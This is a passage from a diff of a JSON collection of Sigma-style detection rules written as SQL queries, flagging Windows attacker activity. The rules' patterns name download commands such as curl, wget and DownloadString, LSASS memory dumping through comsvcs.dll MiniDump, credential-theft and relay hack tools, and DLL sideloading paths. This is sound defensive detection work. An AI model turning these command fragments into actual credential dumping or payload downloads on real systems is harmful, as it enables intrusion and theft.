that download attachments from these domains (OneNote, Outlook 365)" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "test", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", + "tags": [ + "attack.t1546.003", + "attack.persistence" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "falsepositives": [ + "Unknown (data set is too 
small; further testing needed)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + ], + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070" ], "falsepositives": [ - "Possible but rare" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": 
"Florian Roth (Nextron Systems)", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "status": "experimental", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": 
"HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 
'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", - "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "status": "experimental", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', 
'672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', 
'11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", + "status": "experimental", + "description": "Detects potential suspicious winget package installation from a suspicious source.", + "author": "Nasreddine 
Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR 